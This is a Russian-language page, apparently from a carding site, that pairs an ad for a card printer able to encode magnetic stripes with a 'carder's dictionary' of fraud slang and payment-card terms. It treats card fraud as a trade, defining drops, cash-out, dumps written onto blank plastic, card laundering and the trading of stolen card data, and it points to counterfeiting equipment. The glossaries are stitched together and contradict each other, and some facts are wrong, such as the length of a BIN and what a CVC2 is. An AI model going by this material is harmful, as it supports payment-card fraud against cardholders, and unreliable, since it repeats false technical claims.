  • Все: 3 кг
Характеристики

Описание: Eltron P210i может использоваться для печати удостоверений, предпечатных карт в цвете или монохромно. Годится для односторонней печати без полей. Штампует великолепного качества карты с разрешением 300 dpi, позволяет наносить штрихкоды, фотографии, графику или текст. Тихий в работе, маленький и легкий. Есть модификация с кодировщиком магнитной полосы. P210i поставляется с двойным интерфейсом для простоты интеграции в любой системе: USB и Parallel, либо USB и Serial.

Словарь кардера!

Авторизация - проверка и определение полномочий на выполнение некоторых действий. Разрешение, предоставляемое эмитентом для проведения операции с использованием банковской карты. В процессе авторизации данные о карточке и о запрашиваемой сумме передаются в банк-эмитент, где проверяется состояние счета клиента.

Аккаунт (акк, account) - счет.

American Express (AmEx) - международная платежная система, номер карты начинается с 34 или 37 и состоит из 15 цифр.

ATM - Банкомат - устойчивое к взлому банковское защитное средство, предназначенное для: выдачи и приема наличных денежных средств; составления документов по операциям с использованием банковских карт; выдачи информации по счету; осуществления безналичных платежей и т.д. Банкомат оснащен процессором, дисплеем, клавиатурой и ридером, предназначенным для считывания информации с карточки.

BIN - первые 6 цифр номера банковской карты, которые определяют выдавший карту банк и ее тип (классик, голд и т.д.).

Card number - номер карточки - уникальный набор цифр, наносимый на карточку в результате эмбоссирования, а также записываемый в память на магнитную полосу или в микросхему.

Card owner - владелец карточки - организация-эмитент банковской карточки.

CVV (Card verification value) - проверочное значение для номера карты, находится в дампе.

CVV2 - код дополнительной безопасности, находится на задней стороне кары, обычно состоит из 3 цифр.

DL (driver license) - водительские права (англ.).

Expiration date (exp. date) - срок годности карты, есть на самой карте и в дампе.

VISA - международная платежная система, номера карт начинаются с 4. Сайт.

Вестерн Юнион (Western Union) - международная система денежных переводов.

Ваер (Wire transfer) - банковский перевод.

Gold credit card - золотая кредитная карточка - престижная платежная карточка, предоставляющая держателю приоритетный статус, высокий лимит кредитования, автоматическое страхование и другие привилегии.

Дебетовая(дебитная) карта - карта, пользоваться которой можно только в пределе имеющейся на счету суммы.

Дроп - человек, который берет на себя (осознанно или неосознанно) грязную часть работы. Принимает денежные переводы, предоставляет счет для проведения операций другими людьми и т.д.

Кардер - человек, использующий информацию с чужой банковской карточки для получения денег.

Кардинг - получение денег, благодаря использованию информации с чужой банковской карточки.

Картхолдер - держатель банковской карты, физическое или юридическое лицо.

Кидала (Ripper) - человек, кинувший кого-то из кардеров.

Кредитная карта - карта, на которую можно покупать в кредит, т.е. не имея на счете достаточно денег. Размер кредита определяет банк-эмитент.

MasterCard - международная платежная система, номера катр начинаются с 5.

MoneyGramm - система быстрых денежных переводов.

Мыло - E-mail, адрес электронной почты.

Обнал - превращение виртуальных денег в реальные.

PAN - номер банковской карты, чаще всего 16-и значный.

Платежная система - ассоциация банков и компаний, работающих по общим правилам использования карточек. Основу платежной системы составляет совокупность нормативных, договорных, финансовых и информационно-технических средств, а также решений участников, которые регламентируют свои взаимоотношения относительно порядка использования карточек. В платежной системе существуют несколько статусов членства: полное, частичное и т.д. Все карточки, которые принадлежат к одной платежной системе имеют признаки, позволяющие идентифицировать их принадлежность к этой платежной системе.

Prepaid card - карта с предварительно оплаченной суммой - смарт-карта, в которой хранятся электронные деньги, заранее оплаченные владельцем карты.

Скан - просканированый документ, фотография, банковская карта и т.д.

Транзакция - банковская операция, состоящая в переводе денежных средств с одного счета на другой.

Юзать - использовать.

Реальный кардинг.

Банк-эмитент - банк, выдавший банковскую карту.

Corporate card - корпоративная карточка - банковская карточка, которая позволяет ее держателю проводить операции по счету юридического лица. Ответственность перед банком по этому счету несет юридическое лицо.

Valid date - дата действия - число, впечатанное на банковской карточке, начиная с которого карта становится действительной.

Голограмма - голографическая наклейка наносимая впрессовыванием под большой температурой в карточку. Голограмма служит дополнительной степенью защиты от поделок и является обязательным атрибутом банковских карточек.

Дамп (Dump) - информация с магнитной полосы банковской карты, который используется для записи на пластик определенного стандарта для дальнейшего использования в магазине. см. подробнее: здесь.

Electronic Purse - смарт-карта, в которой хранится цифровая наличность. Такая карта позволяет расходовать электронную наличность, создает запись о каждом платеже и позволяет перевести в цифровую наличность деньги с банковского счета.

Ламинатор - устройство для покрытия банковских карт защитной пленкой. см. подробнее: здесь

PIN-kod - код, используемый для авторизации, при помощи которого можно осуществлять операции с банковской карточкой, например: снимать наличные.

Пластик - чаще всего реальные или поддельные пластиковые банковские карточки, также любой пластик, на который можно записать дамп. см. подробнее: здесь, или:здесь.

Пластиковая карточка - пластина стандартных размеров 85.6 х 53.9 х 0.76 мм, изготовленная из устойчивой к механическим и термическим воздействиям пластмассы, является носителем информации.

POS-терминал - электронное устройство, позволяющее считывать информацию с магнитной полосы или чипа карточки и осуществлять связь с банком для проведения авторизации с целью осуществления операции по банковской карточке.

Реальный кардинг - использование информации с чужой банковской карты в реальных магазинах. Как правило для этого используют дампы, записанные на пластик.

Ридер - устройство для чтения магнитной полосы банковской карты. см. подробнее: здесь.

Смарт-карта - банковская карта с чипом, кредитная карточка со встроенным микропроцессором, обладающая высоким уровнем защиты и возможностью проводить многовалютные расчеты. см. подробнее: здесь

Слип - чек, который выдает POS-терминал.

Shopping - поход по магазинам.

Типпер - прибор для окрашивания эмбоссированных символов. см. подробнее: здесь.

Транзакция - совокупность операций взаимодействия держателя карточки с процессинговым центром при осуществлении платежа по карточке или при получении наличности.

Транзакция изменяет состояние карточного счета держателя карточки.

Трек - одна из дорожек на магнитной полосе банковской карты в виде текстового файла, всего их 3.

Эмбоссер - устройство для выдавливания символов (например номера карты) на пластике. см. подробнее: здесь

Энкодер - устройство для записи на карточки с магнитной полосой (пластик) и чтения их. см. подробнее: здесь

Интернет-кардинг.

Адалт (адульт) - порно-сайт

BidPay - платежная система, которая позволяет человеку, купившему что-либо на аукционе, заплатить за его покупку. Это платежная система, которая позволяет безо всяких проблем сделать MO при помощи карты.

Billing - платежная система.

еБей (еБай) - название интернет аукциона eBay.

E-gold - платежная интернет-система.

Интернет-кардинг - использование данных с чужой банковской карты для осуществления всевозможных операций в интернете, с целью получения денег.

Карта (картон, картофель, КК, СС) - номер банковской карточки, который используется для покупок в интернете. Бывает с кодом cvv2 и без.

Мерчант - торговый счет, на который поступают деньги за проданный товар, система торговли он-лайн.

Палка - система денежных переводов PayPal.

Порник - порно-сайт.

Прокси - функция сервера, которая позволяет пользователю работать от его имени.

SalesCart - пакет электронной коммерции, интегрированный с Microsoft FrontPage, предоставляющий возможность осуществлять покупки в Сети.

Сокс (Socks-proxy) - сервер посредник между вашим компьютером и конечным сайтом, используется чтобы скрыть IP.

Спам - масштабная рассылка писем по электронной почте.

SSN (social security number) - номер, который дается каждому жителю США для удобней его налогообложения и отслеживания кредитной истории.

Чарджбек - отзыв банком (кардхолдером) платежа, в отношении которого есть сомнения.

Энролл - связь кредитной карты (счета) с он-лайном с возможностью узнавать и менять данные через интернет.

IP - интернет адрес, состоит из четырех чисел, разделенных точкой, каждое из которых может быть от 0 до 255. Определяет местонахождение пользователя.

WebMoney - платежная интернет-система.

Распространенные сокращения.

Акк, Acc - аккаунт.

АмЕх - American Express.

CC - Карта.

CC-номер - Номер кредитной карты (cc - аббревиатура: credit card)

CVV - Card Verification Value. – определенный номер для проверки подлинности карты. С появлением электронных терминалов мошенники сосредоточились на подделке или изменении информации, хранящейся на магнитной полосе. Для борьбы с такими нарушениями специалисты VISA разработали CVV

Dl - driver license.

Exp. date - Expiration date.

КК - карта.

MG - Money Gramm.

MO - Money Order.

SSn - Social security number.

WM - WebMoney.

WU - Western Union.

ABA Routing Number – уникальное девятизначное число, обычно ставится в нижней части чека перед номером счета (обрамленное двоеточиями). Позволяет однозначно определить банк, где находится сумма, на которую выписан чек.

Acquirer (Acquiring Bank) – банк или финансовая организация, осуществляющая весь спектр операций по взаимодействию с точками обслуживания банковских карт, которая состоит из терминалов в торгово-сервисной сети и банкоматов. При получении данных о произведенных операциях в сети, эквайрер направляет их в систему для проведения соответствующих расчетов. Эквайрер отвечает за возмещение средств торговым точкам, в которых производились покупки или оплачивались услуги с помощью карт.

Address Verification Service (AVS) – операция проверки адреса, куда поступает счет за приобретенный товар.

Approval - подтверждение, код, посылаемый банком-эмитентом в подтверждение того, что пластиковая карта покупателя существует, пригодна к пользованию и запрашиваемая сумма находится в пределах допустимого лимита. Подтверждение запрашивается в процессе операции авторизации.

Automated Teller Machine (ATM) – устройство, предназначенное для получения наличных по пластиковой/smart-карте.

Authorization – авторизация, требование оплаты. Процесс авторизации блокирует деньги на счету, уменьшая свободную для расходования сумму. Чтобы осуществить снятие денежных средств, необходимо завершить процесс авторизации. Если за время, которое определяется эмитентом, процесс авторизация не завершается, она отменяется и ранее заблокированная сумма освобождается для расходования.

Authorization Code - код авторизации. Код, состоящий из букв и цифр, посылаемый банком-эмитентом (Card Issuer), подтверждающий авторизацию. Код авторизации обязательно включается в чек (Sales Draft), выписываемый продавцом.

Bank Identification Number (BIN) - цифры на пластиковой карте, однозначно определяющие банк-эмитент (Issuing Bank). Обычно это первые шесть цифр, которые часто называют бином.

Batch - набор транзакций, сохраняемый для одновременной оплаты, которая происходит обычно раз в день. Batch можно завершить как автоматически, так и с помощью POS-терминала.

Batch Processing - тип обработки данных, при котором определенная совокупность транзакций обрабатывается единовременно.

Billing Address – фактически адрес, на который поступает счет за приобретенный товар.

Capture - решение, о представлении определенной транзакции к оплате. Все транзакции, представленные к оплате, включаются в Batch и направляются процессору платежей или платежному шлюзу.

Card Issuer – организация, ответственная за выпуск и обслуживание пластиковых карт.

Card-Not-Present – ситуация, когда продавец не имеет возможности видеть покупателя, и ему физически недоступна пластиковая карта, то есть он не имеет возможности считать информацию с магнитной полосы, проверить подпись, посмотреть голограмму и т.п. Чтобы повысить надежность оплаты в этом случае используется система Address Verification Service.

Card Unblocking - операция обратная блокированию (Card Blocking).

Certification Authority - организация, которой доверено выдавать сертификаты открытых ключей.

Chargeback – операция возврата платежа. Сумма, которую вычитают со счета продавца по требованию владельца пластиковой карты. Если признана правота владельца карты, у продавца со счета вычитают сумму платежа плюс комиссию за ChargeBack (Chargeback Fee). Операция ChargeBack инициируется эмитентом после того как эквайрер завершил транзакцию.

Chargeback Reason Code – двузначное число, которым кодируется причина возврата платежа.

Check Guarantee - способ, гарантирующий оплату по чеку в пределах суммы, установленной для конкретного счета.

Chip Card – смарт-карта (также IC – integrated circuit card). Пластиковая карта, внутри которой находится микропроцессор, способный хранить «электронные деньги».

Close Batch - передача транзакций с кодами авторизации процессору платежей с целью перевода денег на счет продавца.

Commerce Server – Интернет-сервер, подключенный к процессору платежей, имеющий все необходимое для их принятия: программное обеспечение, хранящее информацию обо всех покупках и общую сумму цен, базу данных и т.д. Commerce Server обычно позволяет установить соединение по одному из защищенных протоколов, например, SSL.

Confirmation Letter – электронное письмо, посылаемое продавцу процессором платежей и содержащее сведения о представленных процессору Batch-файлах.

Credit Card - пластиковая карта, показывающая, что ее владельцу открыт кредит в организации-эмитенте. Это позволяет владельцу совершать покупки или получать деньги в банкомате в пределах установленного договором между держателем и эмитентом максимального лимита.

Credit Card Processors (Third Party Processors) - организация, обычно нанимаемая банком-эквайером , для предоставления услуг по процессингу платежей.

CVV2/CVC2 - это контрольный номер, состоящий из трех цифр, который напечатан на обратной стороне банковской карты. Данный номер отображается в верхнем правом углу специальной полосы для подписи. Ввод номера помогает убедиться, что карта используется настоящим владельцем. CVV2 классификация используется для карт VISA. CVC2 классификация используется для карт MasterCard.

Debit Card – дебетовая банковская карта. В отличие от кредитной карты, суммы, потраченные покупателем, автоматически вычитаются с его счета. Для оплаты дебитной картой обычно требуется PIN

Decline – операция отказа эмитента в авторизации платежа.

Demand Deposit Account (DDA) – стандартный счет (checking account), куда могут быть переведены денежные средства.

Deposit - момент, когда продавец формирует (закрывает) Batch-файл и посылает транзакции для завершения.

Deposit Bank - банк, куда посылаются денежные средства продавца, снятые с карточных счетов покупателей.

Digital Signature - цифровая подпись. Последовательность символов, получаемая методами несимметричной криптографии (Public Key Cryptography), присоединяемая к сообщению и подтверждающая его аутентичность.

Digital Wallet -цифровой бумажник. Программа для оплаты товара по пластиковой карте. Перед тем как купить что-то, покупатель регистрируется в платежном шлюзе, получает имя и пароль, после чего может совершать покупку на любом web-сайте, поддерживающем данный тип цифрового бумажника.

Discount Rate - процент, взимаемый банком-эквайером c продавца за каждую покупку.

E-Commerce - электронная коммерция, определенный род деятельности, осуществляемый с использованием электронных средств связи.

Electronic Data Interchange (EDI) - глобальная компьютерная сеть, отделенная от Интернета, используемая банками и другими финансовыми организациями для проведения платежей.

Electronic Data Capture - использование POS-терминала для авторизации и передачи транзакций процессору банковских карт или иному MAP. Роль POS-терминала может играть специальная программное обеспечение или платежный шлюз (Payment Gateway).

Electronic Cash Register (ECR)- электронный кассовый аппарат, другими словами, комбинация кассового аппарата и POS-терминала. Часто ECR - это программное приложение, установленное на персональном компьютере

Electronic Draft Capture (EDC) - система, в которой транзакции передаются из разных мест на центральный компьютер (Host Computer ) для хранения и обработки. Накопленные за период транзакции затем передаются процессору платежей.

Electronic Money (e-money) - цифровая наличность. Хранится в электронном виде в компьютерах или микропроцессорах. Находится в распоряжении покупателя. Цифровая наличность может быть куплена и сохраняться в специальном накопительном устройстве.

Electronic Purse – smart-карта, на которой хранится цифровая наличность (e-money).

EMV-specification – единые международные требования к микропроцессорным карточкам, описывающие требования к карточке, терминалу и процессу обмена информацией между карточкой и терминалом.

Factoring - ситуация, когда собственный номер идентификации предприятия торговли/услуг в платежной

системе (Merchant Account) используется для приема платежей за дополнительную комиссию для нужд другого продавца. Данная деятельность считается нелегальной.

Floor Limit - если цена товара ниже Floor Limit, продавец может обойтись без авторизации (убедившись, что карта не помещена в список потерянных или украденных). Floor Limit обычно устанавливается эмитентом.

Front-End – информация, которую видит покупатель на web-сайте продавца. Front-End позволяет покупателю взаимодействовать с электронной корзиной, базой данных, а также оплачивать покупки.

Holdback (Reserve Account) - часть средств, полученных продавцом от карточных платежей, блокируемая эквайрером или другим MAP, чтобы покрыть расходы на chargeback и другие спорные выплаты. По истечении определенного срока Holdback возвращается продавцу.

Host Capture - автоматическое составление Batch-файла в процессоре платежей или платежном шлюзе.

Host Computer -компьютер, осуществляющий авторизацию и завершение.

Imprint - считывание параметров карты. Может быть электронным (через POS-терминал) или ручным (получение оттиска карты с помощью импринтера). Imprint необходим для доказательства физического присутствия карты в месте покупки.

Interchange - поток информации между эмитентом и эквайрером, например, транзакции, возврат и т.д.

Interchange Fee – комиссия, которую платит банк-эквайрер банку-эмитенту за каждую операцию перевода с банковской карты. Данная комиссия является частью Discount Fee.

ISO (Independent Service Organization) – организация, помогающая продавцу принимать платежи по пластиковым картам. Прежде чем работать с ISO продавцы должны, как правило, уже иметь открытый Merchant Account.

Issuer (Issuing Bank) -эмитент, банк, выпускающий банковские карты и открывающий карточные счета для физических и юридических лиц.

Key -ключ, набор цифр, используемый в криптографическом алгоритме.

Key length - длина ключа (Key), измеряемая в битах.

Limited-purpose prepaid card - смарт-карта, которую можно использовать только в строго определенных точках продаж товаров или услуг.

Load – операция по загрузке цифровой наличности в цифровой кошелек.

Load Log – запись о последней загрузке цифровой наличности в цифровой кошелек.

Local Review – способность продавца видеть со своего терминала или ECR содержимое Batch-файла до или после завершения транзакции.

Locking (Card Blocking) - блокирование smart-карты, предотвращающее ее дальнейшее использование.

Magnetic Stripe – магнитная полоса. Располагается с обратной стороны пластиковой карты и содержит в закодированном виде информацию о карточном счете, связанном с данной картой.

Manual Entry (Keyed Entry) – операция ручного ввода параметров карты с клавиатуры компьютера или POS-терминала.

Member - финансовое учреждение - член ассоциации международной платежной системы.

Merchant – юридическое лицо, принимающее платежи по пластиковым картам.

Merchant Account - уникальный номера идентификации предприятия торговли/услуг в платежной системе, который позволяет принимать платежи по банковским картам. Регистрируя Marchant Account, банк соглашается оплачивать предприятию торговли/услуг правильно совершенные сделки (покупки) в обмен на снятие средств со счетов покупателей в банках-эмитентах.

Merchant Account Provider (MAP) - организация, открывающая Merchant Account.

Merchant Agreement - письменное соглашение между продавцом и банком (возможно, между продавцом, банком и ISO), устанавливающее права, обязанности и гарантии сторон в процессе приема карточных платежей.

Merchant Bank -банк, в котором открыт Merchant Account.

Merchant Category Code - код, который банк-эквайрер присваивает продавцу. Данный код, обычно состоящий из четырех цифр и называемый иногда Sic Code, отражает основное направление деятельности продавца.

Micropayment – микроплатеж, очень маленькая сумма, возможно, меньше цента.

MID (Merchant Identification Number) – число, однозначно определяющее продавца в платежной системе.

Monthly Minimum – минимальная месячная плата, которую удерживают с продавца за прием платежей по пластиковым картам.

MOTO Discount Rate (Mail Order / Telephone Order) - комиссия, которая удерживается эквайрером с каждой транзакции в случае, когда продавец не имеет доступа к самой карте, зная лишь ее параметры, сообщаемые ему по телефону, факсу или Интернету.

Non-Qualified – обозначение транзакции, характеризующейся повышенным риском (например, в с случае, когда транзакция осуществляется с помощью передачи параметров банковской карты при физической невозможности доступа к ней).

Off-line – обозначение состояния системы, когда между участниками платежной системы нет непосредственной связи.

On-line – обозначение состояния системы, когда перед выполнением транзакции идет соединение с центральным компьютером для авторизации в режиме реального времени.

Open To Buy - размер кредита, доступного в данный момент владельцу карточного счета

Payment Gateway – платежный шлюз. Обычно Интернет-сервер с установленным на нем программным обеспечением, вязывающим web-сервер продавца с процессором платежей.

Payment System - платежная система. Набор банковских процедур и систем межбанковского перевода денежных средств.

Pc Pos Application – компьютерная программное приложение, которая объединяет любые две функции из списка: кассовый аппарат, учет ценностей, бухгалтерская программа, программа для авторизации и приема платежей по кредитным картам.

PIN (Personal Identification Number) – цифровой или алфавитно-цифровой код, доступный лишь владельцу карты. Используется при операциях с карточным счетом, привязанном к данной банковской карте.

POS Terminal (Point of Sale) – электронный прибор, используемый для авторизации и проведения платежей по банковской карте.

Post Authorization - транзакция, которой предшествует голосовая авторизация.

Prepaid card – smart-карта, в которой хранятся электронные деньги, заранее оплаченные владельцем карты.

Prior Authorized Sale – транзакция, для которой сначала проводится авторизация. Продавец авторизует карту, прежде чем предоставить продукт/услугу.

Private Key – секретный ключ, доступ к которому должен иметь только его владелец. Секретному ключу соответствует открытый ключ.

Processor – процессор платежей, компьютерный центр, производящий операции по обработке платежей по банковским картам

Public Key - открытый ключ, несекретная часть пары двух ключей в асимметричной криптографии

Public Key Certificate –сертификат открытого ключа. Информация об открытом ключе, как правило, включающая сам ключ, подписанная цифровой подписью физического лица или организации. Сертификат защищает целостность ключа, если человек или организация, подписавшие его, хорошо известны, а их открытые ключи широко распространены.

Public Key Cryptography – схема шифрования, не требующая конфиденциального канала для установления конфиденциальной связи. Чтобы послать конфиденциальное сообщение, необходим только открытый ключ получателя, который расшифрует полученное сообщение своим секретным ключом.

Public Key Encryption – метод шифрования, разработанный с целью преодоления основного недостатка симметричной криптографии - необходимости иметь надежный канал для передачи ключа адресату.

Real-Time Processing - процесс обработки платежей в режиме реального времени, когда верификация и обработка карточного платежа, немедленно следует за покупкой. Верификация в реальном времени занимает обычно несколько десятков секунд.

Receipt – чек, содержащий описание покупки по банковской карте, обычно включает следующую информацию: дата, имя и адрес продавца, сумма, уникальный номер и код авторизации.

Recurring Fees – регулярные, обычно ежемесячные платежи за пользование Merchant Account. Включают Discount Rate, Transaction Fee, Statement Fee, и Monthly Minimum.

Recurring Transaction – периодическое снятие денег со счета покупателя, происходящее на основании договора, заключенного между покупателем и предприятием торговли/услуг.

Retrieval Request (Copy Request) – требование продавцу представить документацию о конкретной транзакции. Обычно поступает от банка-эмитента в спорных случаях, когда держатель карты оспаривает сделку.

Secure Server – безопасный сервер, позволяющий установить с браузером защищенное соединение по протоколу SSL или SET

Session Key - ключ для симметричного шифрования, который используется ограниченное время, чаще для одного защищенного соединения, например, по протоколу SSL.

SET (Secure Electronic Transaction) - система обеспечения безопасности оплаты по банковским картам, разработанная компанией VISA, MasterCard, Microsoft и несколькими ведущими банками, основанная на шифровании с открытым ключом информации, связанной с параметрами карты, и разделением информации между участниками транзакции таким образом, что ни один из участников расчетов не обладает информацией целиком. С помощью стандарта SET покупатель и продавец могут однозначно идентифицировать друг друга, обменявшись цифровыми SET-сертификатами.

Settlement (Draft Capture) – процесс завершения платежа, когда транзакции посылаются вместе с кодами авторизации процессору платежей для перевода денежных средств продавцу.

Setup Fee – единовременная плата, взимаемая за открытие номера идентификации предприятия торговли/услуг в платежной системе (Merchant Account)

Shopping Cart Program – электронная корзина. Приложение, запускаемое на Интернет-сайте, предназначенное для сбора данных о товаре/услуге, которые посетитель намерен приобрести.

SIC Code – код стандартной бизнес-классификации (Standard Industry Classification). Это четырехзначное число, определяющее тип деятельности.

Smart Card – пластиковая карта, внутри которой находится микропроцессор, способный производить вычисления. Smart-карта предназначена для осуществления платежных, а также операций идентификации.

SSL (Secure Socket Layer) – протокол защищенной связи через Интернет. Основой протокола SSL является метод двухключевой криптографии, использующий для аутентификации взаимодействующих сторон и формирования общего ключа шифрования сертификаты открытых ключей пользователей (клиента и сервера), заверенные цифровой подписью специальных сертификационных центров.Благодаря серверам, поддерживающим протокол SSL, пользователь, загружающий сайт, может быть уверен в трех основных моментах:

Сайт действительно принадлежит компании, которая установила SSL свидетельство.

Используя уникальный «ключ сессии», протокол SSL шифрует всю информацию, которой обмениваются Интернет-сайт и его пользователи Это гарантирует, как минимум, что передаваемые серверу данные не будут просмотрены или перехвачены третьими лицами.

Данные, передаваемые посредством протокола SSL, не могут быть частично утеряны или заменены.

Одним из показателей безопасной связи является адресная строка браузера, в которой при безопасном соединении адрес будет начинаться с https:// вместо обычного http://, с которого начинаются адреса страниц, незащищенных протоколом SSL.

Statement Fee – фиксированная периодическая плата за пользование Merchant Account'ом.

Surcharges – дополнительная плата за прием платежей по банковским картам.

Swipe Discount Rate – процент, взимаемый эквайрером с продавца за каждое снятие денежных средств с физически доступной продавцу банковской карты.

Swiped Card - карта, информация с которой автоматически вводится с использованием POS-терминала.

Symmetric Cryptography –симметричная криптография или криптография с закрытым ключом. Криптографический алгоритм, в котором для кодирования и декодирования используется один и тот же ключ.

Terminal Capture – разновидность приема карточных платежей, когда информация о транзакциях хранится на компьютере продавца, причем последний вручную формирует из них Batch и затем направляет его для оплаты.

Third Party Processor – фирма, не принадлежащая платежной ассоциации VISA или MasterCard, нанимаемая эквайрером для проведения авторизаций и оплаты по пластиковым картам.

Ticket Only – покупка, для которой используется голосовая авторизация.

Transaction – любое взаимодействие между покупателем и продавцом, влияющее на состояние карточного счета покупателя.

Transaction Fee – фиксированная плата, взимаемая с продавца за каждую покупку (обычно в дополнение к Discount Rate).

Transaction File (Vendor File) – файл, в который процессор платежей помещает все транзакции, проведенные за предыдущий день.

Transaction Log – транзакции, записанные в порядке совершения.

Voice Authorization – голосовая авторизация. Применяется, когда нет подходящего устройства для проведения авторизации, например, POS-терминала.

Void – отказ покупателя от оплаты после того, как успешно прошла авторизация, принадлежащей ему карты. Транзакции, помеченные как Void, не включаются в Batch и не предъявляются к дальнейшей оплате.

Кардеры (от англ. "card" - карта) - профессиональные преступники, специализирующиеся на незаконной деятельности в сфере оборота пластиковых карт и их электронных реквизитов.

СЛОВАРЬ ЖАРГОННЫХ СЛОВ И ВЫРАЖЕНИЙ КАРДЕРОВ

БИН (от "банковский идентификационный номер" - англ. "bank identification number (BIN)") - номер, состоящий из 4-х цифр и предназначенный для идентификации банков - эмитентов платежно-расчетных карт в платежной системе. Как правило, первые четыре цифры в номере банковской карты совпадают с БИН ее эмитента.

ВАЛИДНАЯ КАРТА (от англ. "VALID" - "имеющий силу") - действующая или действительная карта; неподдельная карта; идентификационные реквизиты действующей или неподдельной карты.

ВАЛИДНОСТЬ (от англ. "VALID THRU" - "имеет силу до…") - срок действия карты.

ВЕБМАНИ (web money, WM) - платежная система сети "Интернет" (используется для криминальных расчетов при покупке и продаже информации о реквизитах чужих карт, оказании консультационных кардерских услуг и др.); деньги, полученные от незаконной деятельности в сети "Интернет".

ВНЕДРЕНЕЦ - член организованной преступной группы из числа сотрудников мерчанта, эквайрера или эмитента.

ГЕНЕРАТОР (generator) - вредоносная программа для ЭВМ, осуществляющая генерацию цифровых идентификационных реквизитов (обычных и электронных) пластиковых карт (как правило, идентификационной пары).

ЖЕЛЕЗО - аппаратные средства ЭВМ; электронный терминал без программного обеспечения; оборудование для подделки пластиковых карт (персонализатор, принтер, эмбоссер, ламинатор и др.).

ИНФА (infa) - информация, сведения о чем-либо.

КАРДИНГ (carding) - противоправная деятельность в сфере оборота пластиковых карт и их номеров; совершение каких-либо конкретных действий над чужими пластиковыми картами или их номерами.

КАРТЫ (cardz) - платежно-расчетные карты.

КОД-ГРАББЕР - вредоносная программа для ЭВМ, подбирающая секретный ключ, пароль или код доступа к программному обеспечению электронного терминала либо базе данных мерчанта, эквайрера, эмитента для осуществления операции с использованием пластиковой карты или хищения конфиденциальных данных.

КОДЕР (coder) - техническое устройство для записи компьютерных данных (электронных реквизитов) на магнитную полосу карту.

КОДИНГ (coding) - запись компьютерных данных (электронных реквизитов) на магнитную полосу карты.

КОДЫ (codes, codez) - коды доступа к конфиденциальной информации базы данных виртуального магазина, банка-эквайрера или эмитента либо на охраняемый объект; ПИН-код; алгоритм "взлома" защиты от несанкционированного доступа к компьютерной информации или на охраняемый объект.

КОРДЕР (corder) - преступник, специализирующийся на подделке карт с магнитной полосой.

КРЕДА (creda) - кредитная или другая банковская карта либо информация о ней.

КРИПТ (crypt) - криптографический алгоритм преобразования данных; программа генерации идентификационных пар и других цифровых идентификационных реквизитов банковских карт.

КРЯК - "взлом" средства защиты от несанкционированного доступа к конфиденциальной компьютерной информации, содержащейся на пластиковой карте либо клиентской базе данных виртуального магазина, банка-эквайрера или эмитента.

ЛАМЕР (LAMER, LAM3R) - держатель карты или клиент виртуального магазина - потенциальный потерпевший; начинающий кардер.

МЕРТВАЯ КАРТА - карта, не представляющая никакую ценность; карта, с помощью которой по каким-либо причинам нельзя осуществлять операции (находящаяся в розыске, заблокированная, операции по которой отслеживаются правоохранительными органами и т.п.); карта, которую нельзя подделать.

НОМЕР КРЕДЫ - любой идентификационный номер карты; идентификационная пара карты; электронный реквизит карты.

ОРДЕРИТЬ - заказывать товар в виртуальном магазине с использованием реквизитов банковской карты.

ОТМЫТЬ КАРТУ - перевести деньги с карты - со специального карточного счета на другой счет, пользуясь целой цепочкой промежуточных счетов и платежных систем; скрыть ("замести") следы перемещения похищенных денег.

ПАТЧ, ПАЧ (от англ. "patch" - заплата, заплатка) - изменение в электронном реквизите карты или программе для ЭВМ.

ПАТЧИТЬ, ПАЧИТЬ - вносить изменения в электронные реквизиты карты или программу для ЭВМ или.

ПЕРЕШИВАТЬ - изменять, перепрограммировать компьютерные данные (электронные реквизиты), содержащиеся на интегральной микросхеме карты.

ПИН (от англ. "personal identification number" (PIN) - "персональный идентификационный номер") - ПИН-код или PIN-код: секретный ключ электронной цифровой подписи, выдаваемый пользователю (держателю карты, абоненту) сети ЭВМ или электросвязи для его идентификации и предоставления доступа к компьютерной информации.

ПЛАСТИК (plastic), ПЛИТКА - реально существующая пластиковая карта.

ПРОВЕРКА НА ВАЛИДНОСТЬ - проверка на правильность подбора номера, идентификационной пары, ПИН-кода или электронного реквизита карты; проверка на то, принимает ли мерчант карту для проведения платежно-расчетной операции или нет.

ПРОКСИ-СЕРВЕР (от англ. "proxy-server" - "сервер, предоставляющий полномочия") - управляющая ЭВМ компьютерной сети (сервер), которая проводит автоматическую авторизацию пользователей (держателей карт или абонентов) по секретному ключу (ПИН-коду или паролю) и дает разрешение на доступ к компьютерной информации, а также работу с ней.

ПРОШИВА, ПРОШИВКА - программное обеспечение (набор программ для ЭВМ), хранящееся в памяти интегральной микросхемы.

ПРОШИТЬ - записать в память интегральной микросхемы какие-либо данные; тоже, что и "перешивать".

РЕАНИМАТОР (reanimator) - преступник, специализирующийся на подделке ("подзарядке") карт с фиксированной покупательной способностью.

CVC2/CVV2 - последние три цифры номера банковской карты, которые вычисляются по алгоритму криптографического преобразования данных DES с использованием секретного ключа банка - эмитента и устанавливают математическую зависимость номера карты от срока ее действия.

СИМА, СИМКА - SIM-карта.

СЛИТЬ С КАРТЫ - снять деньги с карты - со специального карточного счета или перевести их на другой (как правило, свой) банковский счет; совершить хищение денег с использованием чужой пластиковой карты или ее реквизитов.

ТРЕЙДИНГ (trading) - торговля, обмен похищенной конфиденциальной информацией о реквизитах пластиковых карт и их держателях. Например, "я тебе спам-лист на 3 млн. юзверей, а ты мне 10 валидных кред с cvv2".

ФЕЙКОВЫЙ МАГАЗИН - виртуальный лжемагазин, предназначенный для мошеннических операций с реквизитами банковских карт и персональными данными их держателей (по типу "фирм - однодневок").

ФРАУД (fraud) - незаконные операции, совершаемые с использованием пластиковых карт и их реквизитов.

ХАЧИТЬ, ОТХАЧИТЬ, ЗАХАЧИТЬ, ПРОХАЧИТЬ - осуществлять копирование, модификацию либо блокирование программы для ЭВМ, базы данных или конфиденциальной компьютерной информации.

ЭЛИТА (ELITE, ELYTE) - кардер - профессионал, "авторитет".

ЮЗВЕРИ, ЮЗЕРЫ (от англ. "to use" - пользователь) - держатели пластиковых карт; клиенты электронных платежных систем; пользователи сети ЭВМ "Интернет". Эмбоссер - устройство для выдавливания символов на карте.

Карт принтер - принтер для печати информации (картинки) на карте.

Трек (Дорога) - часть дампа с определенной информацией каждый. 1-ый трек - информация о владельце карты, 2-ой трек - информация о владельце карты, о банке выдавшем карту, и прочее, 3-ий трек - можно сказать, запасной, используется магазинами для начисления очков и прочего.

Дамп - информация, которая пишется на магнитную полосу карты, состоит из 1,2 или 3 треков.

Белый пластик - кусок чистого пластика, на который наносится информация.

акк (от англ. account) - счет.

биллинг (от англ. bill - счет)- платежный, платежная система.

ебэй, ебай - название аукциона eBay [и:'бэй].

мерчант (merchant) - торговый счет, система он-лайн торговли.

